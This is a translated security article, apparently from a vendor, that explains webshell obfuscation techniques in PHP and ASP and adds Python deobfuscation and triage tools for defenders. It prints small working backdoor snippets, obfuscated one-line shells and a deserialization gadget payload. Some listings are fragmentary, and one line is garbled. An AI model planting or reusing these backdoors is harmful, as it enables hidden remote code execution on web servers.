Know the attack to know the defense: highlights of webshell deformation techniques
This article analyzes and summarizes the main techniques used to deform (obfuscate) webshells so that they evade signature-based detection.
0x1: String deformation to hide signatures
The traditional way to make a shell evade detection ("kill-free", 免杀) is to split, encode and transform strings with string functions and string operators, several times over, and then reassemble them into the backdoor code at run time.
Simple string deformation
<%
Function MorfiCoder(Code)
    ' reverse the stored string, then turn the /*/ placeholders back into quotes
    ' and the \*\ placeholders back into line breaks
    MorfiCoder = Replace(Replace(StrReverse(Code), "/*/", """"), "\*\", vbCrlf)
End Function
Execute MorfiCoder(")/*/z/*/(tseuqer lave")
%>
The code stores the one-line backdoor eval request("z") reversed, as ")/*/z/*/(tseuqer lave", with the quotes replaced by the placeholder /*/, so the file on disk contains no matchable signature. When the script is requested, the string is reversed (giving eval request(/*/z/*/)), the placeholders are restored, and the resulting eval request("z") is executed. At present more than 90% of unknown and deformed backdoors use dynamic decoding of this kind.
Complex string combinations
// After a series of complex decoding operations, $ Q stores all the backdoor code $ Q = str_replace ('Do ', '', $ B. $ w. $ K. $. $ H. $ I. $. $ M. $ t. $ f. $ S); // $ y => create_function $ P = $ y ('', $ Q); $ P (); // Finally, the backdoor execution can be triggered by dynamically creating and calling the function variable $ P.
0x2: Deformation using operators
Operators exist in most scripting languages. Each operator applies to certain operand types and performs a different operation, which gives the obfuscator many more ways to transform code.
Bitwise operators in PHP
In PHP the bitwise operators ~, ^, & and | also accept string operands: the operation is applied byte by byte to the characters of the strings, and the result is again a string.
A simple bitwise NOT is enough to leave the stored backdoor code with no recognizable text at all.
Combining several operators makes the pattern completely non-fixed and extremely flexible.
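The following Python script is an added example; it is not part of the original article and not Safedog's code. It shows the analyst's side of this technique: PHP's string bitwise operators are replayed byte by byte and constant-folded out of a captured source snippet, so that the names they hide (here "_POST" built from XOR pairs and "assert" built with a bitwise NOT) become visible to an ordinary keyword scan. Python is used because the folding runs offline on captured files and needs no PHP runtime. The sample shell is constructed for the example, and only double-quoted PHP literals are handled.

```python
import re
from itertools import zip_longest

# PHP bitwise operators on strings work byte by byte: ~ complements every
# byte; ^ and & stop at the shorter operand; | runs to the longer operand,
# treating the missing bytes of the shorter one as 0.
def php_not(data: bytes) -> bytes:
    return bytes((~b) & 0xFF for b in data)

def php_xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))

def php_and(a: bytes, b: bytes) -> bytes:
    return bytes(x & y for x, y in zip(a, b))

def php_or(a: bytes, b: bytes) -> bytes:
    return bytes(x | y for x, y in zip_longest(a, b, fillvalue=0))

_HEX = re.compile(r"[0-9A-Fa-f]{1,2}")
_ESC = {"n": b"\n", "t": b"\t", "r": b"\r", "\\": b"\\", '"': b'"', "$": b"$"}

def php_unescape(body: str) -> bytes:
    """Decode the body of a PHP double-quoted literal (\\xHH and the common
    one-character escapes, which is all obfuscated shells use)."""
    out, i = bytearray(), 0
    while i < len(body):
        if body[i] == "\\" and i + 1 < len(body):
            m = _HEX.match(body, i + 2) if body[i + 1] == "x" else None
            if m:
                out.append(int(m.group(0), 16))
                i = m.end()
                continue
            if body[i + 1] in _ESC:
                out += _ESC[body[i + 1]]
                i += 2
                continue
        out += body[i].encode("utf-8")
        i += 1
    return bytes(out)

def php_quote(data: bytes) -> str:
    """Re-emit bytes as a PHP double-quoted literal, hex-escaping anything
    that is not printable ASCII and the characters " \\ $."""
    return '"' + "".join(chr(b) if 0x20 <= b < 0x7F and chr(b) not in '"\\$'
                         else "\\x%02x" % b for b in data) + '"'

# Tokens: ("str", bytes) for a double-quoted literal, ("op", char) for any
# other non-blank character. Whitespace outside literals is dropped.
_TOKEN = re.compile(r'"((?:[^"\\]|\\.)*)"|(\s+)|(.)', re.S)

def tokenize(src: str):
    toks = []
    for m in _TOKEN.finditer(src):
        if m.group(1) is not None:
            toks.append(("str", php_unescape(m.group(1))))
        elif m.group(3) is not None:
            toks.append(("op", m.group(3)))
    return toks

_BINOPS = {"^": php_xor, "&": php_and, "|": php_or, ".": lambda a, b: a + b}

def fold(toks):
    """Constant-fold  ~"s",  "s" op "s"  and  ("s")  until nothing changes."""
    changed = True
    while changed:
        changed, out, i = False, [], 0
        while i < len(toks):
            t, nxt = toks[i], toks[i + 1:i + 3]
            if t == ("op", "~") and nxt and nxt[0][0] == "str":
                out.append(("str", php_not(nxt[0][1])))
                i += 2
            elif (t[0] == "str" and len(nxt) == 2 and nxt[0][0] == "op"
                  and nxt[0][1] in _BINOPS and nxt[1][0] == "str"):
                out.append(("str", _BINOPS[nxt[0][1]](t[1], nxt[1][1])))
                i += 3
            elif (t == ("op", "(") and len(nxt) == 2 and nxt[0][0] == "str"
                  and nxt[1] == ("op", ")")
                  # a parenthesised literal, unless it is a call argument
                  and not (out and out[-1][0] == "op"
                           and (out[-1][1].isalnum() or out[-1][1] in "_$]"))):
                out.append(nxt[0])
                i += 3
            else:
                out.append(t)
                i += 1
                continue
            changed = True
        toks = out
    return toks

def resolve_bitwise_literals(src: str) -> str:
    return "".join(php_quote(v) if k == "str" else v for k, v in fold(tokenize(src)))

DANGEROUS = re.compile(r"\b(eval|assert|system|exec|passthru|shell_exec|create_function)\b", re.I)

def scan(src: str):
    """Return the folded source and the dangerous names visible in it."""
    folded = resolve_bitwise_literals(src)
    return folded, sorted({m.group(1).lower() for m in DANGEROUS.finditer(folded)})

# Constructed sample (not from the article): "_POST" from XOR pairs, "assert"
# from a bitwise NOT; no keyword is visible in the raw text.
SAMPLE_SHELL = (r'$_=("#"^"|").("."^"~").("/"^"`").("|"^"/").("{"^"/");'
                r'$__=~"\x9e\x8c\x8c\x9a\x8d\x8b";$__(${$_}["x"]);')

if __name__ == "__main__":
    print(*scan(SAMPLE_SHELL), sep="\n")
```

Run on the sample, the raw text contains no dangerous keyword at all, while the folded output reads $_="_POST";$__="assert";$__(${$_}["x"]); and the scan reports assert. The folding is a fixed-point loop, so chains of any length (the article's "combination of more operators") collapse in the same way; single-quoted literals, which carry raw bytes rather than \x escapes, would need the tokenizer extended.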
0x3: Distributed data patterns
The traditional one-line Trojan (一句话木马) is trivially detected and killed, but after several rounds of code transformation it becomes hard to recognize by eye; without a dedicated tool it is difficult to recover the original code.
Principle: load external input into a particular data structure, then extract the pieces in a particular way and combine them into the attack code, so that the characteristic identifiers are scattered across the file.
Simple array deformation
<?php
// The head of this listing was lost in extraction: a call that builds the
// array $_ from the request parameter preceded this line.
... $_GET["a"]);
// The payload is pulled back out of the array under a chosen key and evaluated.
echo eval($_["exp"]);
?>
Because PHP and similar scripting languages are so flexible, variable names are hard to pin down: an attacker can put the input parameters into an array, assign them to confusingly named variables, and finally call them.
Complex array deformation
<?php
// The head of this listing was lost in extraction; only the one-line payload
// that the array fragments are assembled into survives.
eval($_POST[x]);
?>
Keywords are stored in arrays, then extracted and combined into the names of key functions, which are called as variable functions. A characteristic of this type of deformed script is that it is "anti-human": it looks nothing like normal web application code, which to some extent also makes it the easiest kind to identify.
0x4: Increasing complexity with the language's built-in transformation functions
The more functions a language offers, the more powerful it is and the easier code deformation becomes. Mixing several functions and encoding conversions is the basis of the obfuscation and encryption algorithms used by the various code packers.
str_rot13 deformation
base64 encoding and decoding
<?php
// Only the tail of the encoder, phpencode(), survived extraction; it ended with
//     ...'; return $encode; }
// The matching decoder reverses base64 and then raw deflate (gzinflate).
function phpdecode($code) {
    // strip the separators the encoder inserted into the blob (the search list
    // was probably longer in the original; extraction collapsed it)
    $code = str_replace(array(' '), array('', ''), $code);
    $decode = base64_decode($code);
    $decode = @gzinflate($decode);
    return $decode;
}
?>
urlencode conversion
utf8_encode
There are thousands of transcoding routines and the ways to combine them are endless. Most of the encryption (packing) software on the market today is built on these functions and then adds further layers. They are popular because they require no extension (pure PHP, "green"), are portable and widely available, and produce heavily obfuscated output; in addition the encoding rounds can be nested so that the decoding loop becomes extremely complex, which is why they are so widely used in "kill-free" shells.
The original article shows a before/after comparison screenshot of an encoded shell at this point.
The encoded form cannot be recognized by eye, but Safedog's Xiaotian engine can still analyze it accurately and remove it.
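As an added example (not from the article and not Safedog's engine), the script below replays the decoding functions discussed in 0x1 and 0x4 (strrev, str_rot13, base64_decode, urldecode, gzinflate, gzuncompress) to peel an eval(...) wrapper chain layer by layer, which is what a scanner has to do before any signature match can work. It is written in Python rather than PHP so it can run offline over captured files. The sample shell is constructed inside the script with two wrapping rounds and is not a real specimen; the peeler handles only single-statement chains over a plain literal, which is the common form.

```python
import base64
import codecs
import re
import urllib.parse
import zlib

def _rot13(data: bytes) -> bytes:
    return codecs.encode(data.decode("latin-1"), "rot_13").encode("latin-1")

# PHP decoding functions this peeler knows how to replay. gzinflate() is a
# raw DEFLATE stream with no zlib header, hence the negative window size.
DECODERS = {
    "base64_decode": base64.b64decode,
    "str_rot13": _rot13,
    "strrev": lambda b: b[::-1],
    "urldecode": urllib.parse.unquote_to_bytes,
    "gzinflate": lambda b: zlib.decompress(b, -15),
    "gzuncompress": zlib.decompress,
}

# One statement of the form  [<?php] [@]eval( f1( f2( ... 'literal' ))) ; [?>]
_LAYER = re.compile(
    rb"""^\s*(?:<\?php)?\s*@?eval\s*\(\s*((?:@?\w+\s*\(\s*)*)(['"])([^'"]*)\2\s*\)+\s*;?\s*(?:\?>)?\s*$""",
    re.S,
)

def peel(src: bytes, max_layers: int = 32):
    """Strip eval(decoder(...)) wrappers layer by layer. Returns every layer,
    outermost first, stopping at plaintext or at a decoder it does not know."""
    layers = [src]
    for _ in range(max_layers):
        m = _LAYER.match(layers[-1])
        if not m:
            break
        data = m.group(3)
        for name in reversed(re.findall(rb"\w+", m.group(1))):  # innermost call first
            fn = DECODERS.get(name.decode())
            if fn is None:
                return layers
            data = fn(data)
        layers.append(data)
    return layers

ONE_LINER = re.compile(rb"\b(eval|assert)\s*\(\s*\$_(POST|GET|REQUEST|COOKIE)\b")

def analyze(src: bytes):
    """(layers removed, innermost code, does it look like a one-line shell)"""
    layers = peel(src)
    return len(layers) - 1, layers[-1], ONE_LINER.search(layers[-1]) is not None

# --- constructed sample, built here rather than taken from a real shell ---
PLAINTEXT = b"<?php @eval($_POST['cmd']); ?>"

def gzdeflate(data: bytes) -> bytes:
    """PHP gzdeflate(): raw DEFLATE without zlib framing."""
    c = zlib.compressobj(9, zlib.DEFLATED, -15)
    return c.compress(data) + c.flush()

def build_sample() -> bytes:
    """Two wrapping rounds: gzinflate+base64 inside, str_rot13+base64 outside."""
    inner = b"eval(gzinflate(base64_decode('" + base64.b64encode(gzdeflate(PLAINTEXT)) + b"')));"
    outer_blob = base64.b64encode(_rot13(inner))
    return b"<?php eval(str_rot13(base64_decode('" + outer_blob + b"'))); ?>"

if __name__ == "__main__":
    depth, code, hit = analyze(build_sample())
    print(depth, hit)      # 2 True
    print(code.decode())   # <?php @eval($_POST['cmd']); ?>
```

The one-liner signature does not match the wrapped file at all, but after two peeled layers the plaintext eval($_POST['cmd']) is back. Stopping at an unknown decoder (rather than guessing) is deliberate: the layers recovered so far are still reported, and the unknown function name is itself a useful indicator for a scanner.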
0x5: Using custom functions to increase code complexity
With custom encryption and decryption functions, any signature can be hidden completely. This kind of encryption is widely used in Trojan packing.
Common examples include reversible and irreversible encryption.
Reversible encryption, as shown in the original figure: the encryption only serves to get past signature scanning. Once the shell file itself is obtained, its plaintext can be recovered by running the matching decryption function, because the key and algorithm are contained in the file.
Irreversible encryption (from the defender's point of view): the whole shell body is encrypted with a cipher such as DES (symmetric) or RSA (asymmetric), and the key is not stored on the server. The attacker supplies the key (the private key, in the RSA case) from the client side with each request; the shell decrypts its body and then executes it. Even if the encrypted shell is captured, its plaintext cannot be recovered without that key, and only the decryption stub remains for analysis.
0x6: Increasing recognition complexity with language features
Some languages have unique features and functions that can be used to obfuscate code. PHP has a great many, so only a few common ones are listed here.
Code execution through the regular-expression replacement function
preg_replace() prototype:
mixed preg_replace(mixed $pattern, mixed $replacement, mixed $subject [, int $limit])
With the /e modifier, preg_replace() evaluates the replacement parameter as PHP code after substitution, so an attacker-controlled replacement is equivalent to eval. (The modifier was deprecated in PHP 5.5 and removed in PHP 7.0.)
Syntax features
Code execution inside curly braces
<?php
// The head of this listing was lost in extraction; $tk is an array that holds
// the function name under the key "a", i.e. $tk = array(... "assert");
// Inside a double-quoted string, ${expr} evaluates expr, so the call below runs.
$a = "${$tk["a"]($_GET[a])}";
?>
Exploiting the curly-brace syntax
Constant
Dynamic Function Creation
Serialization and deserialization
<?php
// The body of this class is only partially preserved in the listing; the
// payload stored in $var is executed from a magic method (such as __destruct)
// when the deserialized object is destroyed.
class Example {
    var $var = '';
    function __destruct() {
        eval($this->var);
    }
}
unserialize($_GET['name']);
?>
index.php?name=O:7:"Example":1:{s:3:"var";s:10:"phpinfo();";}
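To triage such payloads without handing them to PHP's unserialize(), the following Python parser (added here; not part of the article) reads the serialization format itself: scalars, arrays and objects (O:len:"Class":count:{...}), including nesting, and reports object properties whose string values look like code. The Example payload is the one from the request shown above; the other inputs in the usage are constructed.

```python
import re
from dataclasses import dataclass

@dataclass
class PHPObject:
    """O:len:"Class":n:{...} -- the node a gadget payload has to contain."""
    cls: str
    props: dict

class UnserializeError(ValueError):
    pass

def _expect(d: bytes, i: int, want: bytes) -> int:
    if d[i:i + len(want)] != want:
        raise UnserializeError("expected %r at offset %d" % (want, i))
    return i + len(want)

def _length_prefixed(d: bytes, i: int):
    """Parse  <digits>:"<bytes>"  starting at i; returns (bytes, next offset).
    The length is a byte count, so binary-safe strings are handled correctly."""
    colon = d.index(b":", i)
    n = int(d[i:colon])
    start = _expect(d, colon, b':"')
    return d[start:start + n], _expect(d, start + n, b'"')

def _parse(d: bytes, i: int):
    t = d[i:i + 1]
    if t == b"N":
        return None, _expect(d, i + 1, b";")
    if t in (b"i", b"d", b"b"):
        end = d.index(b";", i)
        raw = d[i + 2:end]
        val = int(raw) if t == b"i" else float(raw) if t == b"d" else raw == b"1"
        return val, end + 1
    if t == b"s":
        s, i = _length_prefixed(d, i + 2)
        return s.decode("latin-1"), _expect(d, i, b";")
    if t == b"a":
        colon = d.index(b":", i + 2)
        count, i = int(d[i + 2:colon]), _expect(d, colon, b":{")
        items = {}
        for _ in range(count):
            k, i = _parse(d, i)
            items[k], i = _parse(d, i)
        return items, _expect(d, i, b"}")
    if t == b"O":
        name, i = _length_prefixed(d, i + 2)
        i = _expect(d, i, b":")
        colon = d.index(b":", i)
        count, i = int(d[i:colon]), _expect(d, colon, b":{")
        props = {}
        for _ in range(count):
            k, i = _parse(d, i)
            props[k], i = _parse(d, i)
        return PHPObject(name.decode("latin-1"), props), _expect(d, i, b"}")
    raise UnserializeError("unsupported type %r at offset %d" % (t, i))

def unserialize(data: bytes):
    val, end = _parse(data, 0)
    if end != len(data):
        raise UnserializeError("trailing bytes at offset %d" % end)
    return val

def objects_in(value):
    """Walk the parsed tree and yield every PHPObject, including nested ones."""
    if isinstance(value, PHPObject):
        yield value
        value = value.props
    if isinstance(value, dict):
        for v in value.values():
            yield from objects_in(v)

CODE_LIKE = re.compile(r"\w+\s*\(.*\)\s*;|\$_(?:GET|POST|REQUEST|COOKIE)\b")

def triage(data: bytes):
    """(class, property) pairs whose string value looks like PHP code."""
    return [(o.cls, k) for o in objects_in(unserialize(data))
            for k, v in o.props.items() if isinstance(v, str) and CODE_LIKE.search(v)]

# The request parameter from the article's example
PAYLOAD = b'O:7:"Example":1:{s:3:"var";s:10:"phpinfo();";}'

if __name__ == "__main__":
    print(unserialize(PAYLOAD))   # PHPObject(cls='Example', props={'var': 'phpinfo();'})
    print(triage(PAYLOAD))        # [('Example', 'var')]
```

Because the parser never instantiates anything, it can be pointed at cookies, session files and request logs safely. The property value "phpinfo();" is flagged by the code-like check; a benign object such as O:3:"Foo":1:{s:1:"n";N;} produces no finding, which is the distinction a detector needs.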
0x7: Using advanced syntax features
Advanced syntax features increase programmer productivity, and at the same time give attackers more convenience.
Reflection mechanism
The backdoor code is placed inside a /** */ doc comment, read back through the class reflection API (e.g. ReflectionClass::getDocComment()) and executed through a dynamic function call. This is powerful because the comment can hold code in any format, with no restriction on line structure, and it is extremely flexible.
Classes
The operations are wrapped in an ordinary-looking class and then called; the result is almost indistinguishable from normal code, which raises the difficulty of detection and removal further.
Summary: from simple string deformation to complex random string generation and recombination; from single-file Trojans to multi-file encapsulation and calling; from recognizable one-liners to multiply encrypted, asymmetrically keyed backdoors; from backdoors built by stacking script functions to container-based, layered remote control. As new techniques keep appearing, the characteristics and usage of webshells will become ever more harmful. Safedog believes that only a dynamic, adversarial approach with dynamic learning mechanisms can cope with future attacks.